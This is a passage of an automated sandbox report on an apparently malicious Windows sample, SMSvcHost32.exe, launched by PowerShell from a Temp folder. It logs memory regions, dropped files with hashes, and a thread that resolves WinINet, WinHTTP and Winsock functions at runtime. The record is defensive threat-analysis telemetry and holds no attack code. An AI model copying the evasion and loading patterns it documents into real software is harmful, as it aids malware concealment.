1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, type = file_attributes |
|
3 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
1 | |
| Process | Create | process_name = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, show_window = SW_SHOWNORMAL |
|
1 |
Thread 0xb6c
30
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
199 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 |
Thread 0xed4
30
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
66 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 |
Process #6: smsvchost32.exe
13169
272
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
| Command Line | "C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe" |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:00:59, Reason: Child Process |
| Unmonitor | End Time: 00:01:27, Reason: Self Terminated |
| Monitor Duration | 00:00:28 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdb0 |
| Parent PID | 0xff8 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DA8
0x
CBC
0x
D54
0x
E30
0x
A40
0x
9D8
0x
D44
0x
D68
0x
814
0x
D8C
0x
370
0x
E7C
0x
F88
0x
EA0
0x
EB4
0x
748
0x
D6C
0x
BC0
0x
CC4
0x
E3C
0x
D00
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| smsvchost32.exe | 0x00400000 | 0x0043cfff | Memory Mapped File | rwx |
|
|
|
|
| locale.nls | 0x00440000 | 0x004fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x00500fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x00620fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x00630fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x00682fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x006a6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006e6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x006d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| counters.dat | 0x006e0000 | 0x006e0fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x00706fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006f3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00700fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00997fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x00b20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x01f2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaut32.dll | 0x01f30000 | 0x01fc0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f30000 | 0x01f30000 | 0x0202ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02030000 | 0x02366fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x0246ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x023affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x023c6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x023effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x0242ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x02446fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x0246ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002470000 | 0x02470000 | 0x024affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x025affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025b0000 | 0x025b0000 | 0x026affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026b0000 | 0x026b0000 | 0x026effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026f0000 | 0x026f0000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x0282ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x0292ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x0296ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002970000 | 0x02970000 | 0x02a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a70000 | 0x02a70000 | 0x02aaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ab0000 | 0x02ab0000 | 0x02baffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bb0000 | 0x02bb0000 | 0x02bc6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002bb0000 | 0x02bb0000 | 0x02bc7fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x0000000002bb0000 | 0x02bb0000 | 0x02caffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c10000 | 0x02c10000 | 0x02d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002cb0000 | 0x02cb0000 | 0x02daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d10000 | 0x02d10000 | 0x02d26fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002eb0000 | 0x02eb0000 | 0x02faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fb0000 | 0x02fb0000 | 0x02fc6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002fb0000 | 0x02fb0000 | 0x02fb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002fc0000 | 0x02fc0000 | 0x02fc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002fd0000 | 0x02fd0000 | 0x02fe6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fd0000 | 0x02fd0000 | 0x0300ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003010000 | 0x03010000 | 0x0310ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003110000 | 0x03110000 | 0x0314ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x0324ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003250000 | 0x03250000 | 0x03266fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003250000 | 0x03250000 | 0x0328ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x0338ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003390000 | 0x03390000 | 0x033a6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003390000 | 0x03390000 | 0x03391fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000033a0000 | 0x033a0000 | 0x033a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000033b0000 | 0x033b0000 | 0x037aafff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000037b0000 | 0x037b0000 | 0x037c6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037b0000 | 0x037b0000 | 0x037b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037c0000 | 0x037c0000 | 0x037d6fff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x6ff40000 | 0x6ff52fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x6ff60000 | 0x6ff69fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x6ff70000 | 0x6ff84fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x6ff90000 | 0x6ff99fff | Memory Mapped File | rwx |
|
|
|
- |
| eappcfg.dll | 0x6ffa0000 | 0x6ffe9fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x6fff0000 | 0x6fff7fff | Memory Mapped File | rwx |
|
|
|
- |
| cmutil.dll | 0x70000000 | 0x7000efff | Memory Mapped File | rwx |
|
|
|
- |
| cmpbk32.dll | 0x70010000 | 0x70019fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x70090000 | 0x70097fff | Memory Mapped File | rwx |
|
|
|
- |
| ntasn1.dll | 0x700c0000 | 0x700ebfff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x700f0000 | 0x7010ffff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x70110000 | 0x7011ffff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x70120000 | 0x70183fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x701e0000 | 0x701f8fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x70200000 | 0x70207fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x70210000 | 0x702aafff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x702b0000 | 0x704bcfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x704c0000 | 0x7063dfff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x70b90000 | 0x70ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x71cd0000 | 0x71d16fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x71d20000 | 0x71d27fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x71d60000 | 0x71de3fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x71ea0000 | 0x71eeefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x721f0000 | 0x724bafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74330000 | 0x7434afff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x745e0000 | 0x74671fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74770000 | 0x747b3fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74aa0000 | 0x74b1afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74b20000 | 0x74b64fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x74b70000 | 0x75068fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75120000 | 0x7651efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x766e0000 | 0x766eefff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76b60000 | 0x76bf1fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x76c00000 | 0x76c41fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76ec0000 | 0x76ef6fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x77050000 | 0x771c7fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x771d0000 | 0x772bafff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x772c0000 | 0x772c5fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x772d0000 | 0x772ddfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77310000 | 0x77393fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77400000 | 0x7748cfff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x77490000 | 0x774a2fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x774b0000 | 0x774b6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77760000 | 0x7776bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 14 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | 0.27 KB |
MD5:
f25c271f0546fe0eed669c069bb05704
SHA1: e521751ce40704cafa5411c91dcb93051b7e5957 SHA256: 8eebfec342b27bbbf07b0d8a98e33c8f30641ee825380cd2720fc1bcac6977ac SSDeep: 6:AkAh+BIHgVooT4WY/fWg6Jmfu43mfuX8Phn23fobAd9:Q+BIASL/fOmf/mfb0o49 |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | 0.29 KB |
MD5:
43a97b98561250a80a6e4796184a2448
SHA1: 8e4834df9c9cfd7ea8e56ceae3eda919562242d4 SHA256: 0d26b62e32131ff929ff0fe92a4e5f47f7072b3450777ba992d149a20c2d6568 SSDeep: 6:AkAh+BIHgVooT4WY/fWg1HVPABHfdCtHVPABHfnhn23fobAd9:Q+BIASL/frHixfd6Hixfco49 |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp | 245.50 KB |
MD5:
3cf7a348da34fbb5b7a77f49e6219a76
SHA1: ace28cb17ef956527798c4dc77c50e5559c74cdb SHA256: 1eceed1163da873e4988bd7b232c751a3f7699035e458db2abf8c4483a627409 SSDeep: 6144:22C5kIiyCoHmrokIR7CcGIt11H+9cfKa:2Z5zPGrokIR77FhH+T |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | 0.32 KB |
MD5:
24f141ab1d24504e4ed2a44d2d01d6d4
SHA1: 8f8a7e2dc9a5f24676e6f446fcd8ab56fa892d1b SHA256: a30f3bbb951c4dff93c903d825d8a1abe70f7a4bdc70e5e1c1f4d942ffc152c0 SSDeep: 6:AkAh+BIHgVooT4WY/fWg50tbI3iU0tbIahn23fobAd9:Q+BIASL/frMuMWo49 |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | 0.29 KB |
MD5:
680bd3adc61ba11360e5237545ded69b
SHA1: 17b1b994c7a45fb4ad44f2a76060ee601a7e4ddb SHA256: 3725d719d2f2dba93b0acbabc42be908be71ba742123690f8ea3e6142975a89a SSDeep: 6:AkAh+BIHgVooT4WY/fWg574qShBME/T7SQJ4qShBME/SPhn23fobAd9:Q+BIASL/fsj9eQijVo49 |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | 0.27 KB |
MD5:
d63332b5a8254668fbae1255b085775d
SHA1: 4e82e31ad4e2eff91feec5f3827ed31168da3ca4 SHA256: 66db29d5f893e6629dacd2a8097643fac25e67f707399b0b72e41506c164886b SSDeep: 6:AkAh+BIHgVooT4WY/fWgJDIQlLJobNDHHAIQlLJobNDjPhn23fobAd9:Q+BIASL/fXJobRneJobRj0o49 |
|
|
Threads
Thread 0xda8
246
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Load | module_name = k, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = eappcfg.dll, base_address = 0x6ffa0000 |
|
1 | |
| Module | Load | module_name = Kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Handle | module_name = WININET.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x702b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x70351880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x70357d00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x70351dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersA, address_out = 0x7032c3f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7037d200 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x70378e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x703f0da0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x70337320 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x7032bec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x70378490 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x70330fd0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shlwapi.dll, base_address = 0x74b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x74b37a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCatW, address_out = 0x74b484a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCpyW, address_out = 0x74b484e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpIW, address_out = 0x74b34750 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCpyNW, address_out = 0x74b433f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrA, address_out = 0x74b43570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrDupW, address_out = 0x74b39060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x74b381b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrRChrW, address_out = 0x74b3d1c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpW, address_out = 0x74b35fe0 |
|
1 | |
| Module | Get Handle | module_name = PSAPI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetProcessImageFileNameA, address_out = 0x772c16a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = _chkstk, address_out = 0x779da570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlAllocateHeap, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlFreeHeap, address_out = 0x77990230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memset, address_out = 0x779dcfe0 |
|
1 | |
| Module | Get Handle | module_name = USERENV.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = USERENV.dll, base_address = 0x701e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = CreateEnvironmentBlock, address_out = 0x701e4480 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = GetProfilesDirectoryW, address_out = 0x701e45a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = DestroyEnvironmentBlock, address_out = 0x701e4510 |
|
1 | |
| Module | Get Handle | module_name = WS2_32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WS2_32.dll, base_address = 0x746c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x746f1110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 2, address_out = 0x746d3230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 3, address_out = 0x746cead0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x746c5240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 23, address_out = 0x746ce6b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 15, address_out = 0x746c4a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 115, address_out = 0x746c6520 |
|
1 | |
| Module | Get Handle | module_name = WINHTTP.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WINHTTP.dll, base_address = 0x70210000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryDataAvailable, address_out = 0x702347a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpReceiveResponse, address_out = 0x7021c8e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpOpen, address_out = 0x70246720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpAddRequestHeaders, address_out = 0x70229400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryHeaders, address_out = 0x702309c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpReadData, address_out = 0x70234ea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpOpenRequest, address_out = 0x70248dd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpSetOption, address_out = 0x702306f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpCloseHandle, address_out = 0x70233ad0 |
|
1 | |
